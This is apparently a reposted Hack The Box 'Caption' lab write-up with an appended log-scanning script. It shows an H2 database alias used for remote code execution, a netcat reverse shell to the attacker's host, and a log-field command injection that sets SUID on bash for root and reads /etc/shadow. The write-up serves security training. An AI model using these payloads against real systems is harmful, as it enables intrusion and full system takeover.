HTB-Caption notes (quick writeup)

admin, 2024-09-19 13:18:27 (38 views, 3014 characters, about 10 minutes of reading)

Scanning the target

nmap -T4 -A -v 10.10.11.33

The scan turned up 5 open ports and the domain name caption.htb. Open port 80 and take a look.

This looks quite nice; I will save the site after getting a shell. Unfortunately there are no credentials here, so let's look at port 8080 instead.

Browsing around a bit and clicking "System Administration" in the top right corner reveals a writable database.

This article can be used as a reference for getting a shell:

https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
}$$;
CALL SHELLEXEC('busybox nc 10.10.14.xx 9999 -e sh')

That gives us the user flag. For convenience, generate a key pair with ssh-keygen -t rsa and then log in over SSH.

In the background there is a service on port 9090. Proxy it out; port 9090 cannot be opened in a browser. Next comes privilege escalation: first create malicious.log, then create a sh file with the contents below. Everything goes into /tmp on the target.

malicious.log:

127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #"

payload.sh:

chmod +s /bin/bash

log_service.thrift:

namespace go log_service

service LogService {
    string ReadLogFile(1: string filePath)
}

The Thrift compiler can be installed by following this guide:

https://thrift-tutorial.readthedocs.io/en/latest/installation.html

apt install thrift-compiler
thrift -r --gen py log_service.thrift

Then go into the generated gen folder and create a client script:

from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService  # import the generated Thrift client code


def main():
    # Set up the transport to the server
    transport = TSocket.TSocket('localhost', 9090)
    # Use a buffered transport for better performance
    transport = TTransport.TBufferedTransport(transport)
    # Use the binary protocol
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    # Create a client for the service
    client = LogService.Client(protocol)
    # Open the connection
    transport.open()
    try:
        # Path of the log file to be processed
        log_file_path = "/tmp/malicious.log"
        # Call the remote method ReadLogFile and fetch the result
        response = client.ReadLogFile(log_file_path)
        print("Server response:", response)
    except Thrift.TException as tx:
        # Catch Thrift exceptions
        print(f"Thrift exception: {tx}")
    # Close the transport
    transport.close()


if __name__ == '__main__':
    main()

Then run bash -p on the target; the resulting root shell can read /etc/shadow.
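As an added defender-side example (not part of the original writeup, and not the box's own log service): a small Python scanner that parses lines in the malicious.log format above, flags user-agent values that carry shell syntax, and shows shlex.quote as the minimal mitigation when a log consumer must hand a field to a shell at all. The sample log lines are constructed for this example.

```python
import re
import shlex

# Constructed sample lines in the single-line format malicious.log uses:
# a client IP followed by a quoted "user-agent" field.
SAMPLE_LOG = """\
10.10.14.5 "user-agent":"Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"
127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #"
10.10.14.7 "user-agent":"curl/8.4.0"
10.10.14.9 "user-agent":"$(id)"
"""

UA_FIELD = re.compile(r'"user-agent":"(.*)"\s*$')
# Quote breaks followed by a separator, pipes, command substitution, chained
# commands, interpreter paths and a trailing comment marker. A bare ';' is
# deliberately not flagged, since ordinary browser UAs contain it.
SHELL_META = re.compile(r"""'\s*[;&|]|[`|]|\$\(|&&|/bin/|#\s*$""")


def extract_user_agent(line: str):
    """Return the user-agent value of one log line, or None if absent."""
    m = UA_FIELD.search(line)
    return m.group(1) if m else None


def is_suspicious(ua: str) -> bool:
    """True when the field carries shell syntax a real client never sends."""
    return SHELL_META.search(ua) is not None


def find_injections(log_text: str):
    """Scan a log and return (line_no, user_agent) for every flagged line."""
    hits = []
    for no, line in enumerate(log_text.splitlines(), start=1):
        ua = extract_user_agent(line)
        if ua is not None and is_suspicious(ua):
            hits.append((no, ua))
    return hits


def shell_safe(ua: str) -> str:
    """Quote a field so a shell treats it as one literal word, never as syntax."""
    return shlex.quote(ua)


if __name__ == "__main__":
    for no, ua in find_injections(SAMPLE_LOG):
        print(f"line {no}: suspicious user-agent {ua!r} -> {shell_safe(ua)}")
```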


Originally published on the WeChat public account "Jiyou too beautiful": HTB-Caption笔记(水文版)

Reposted by CN-SEC: https://cn-sec.com/archives/3180890.html
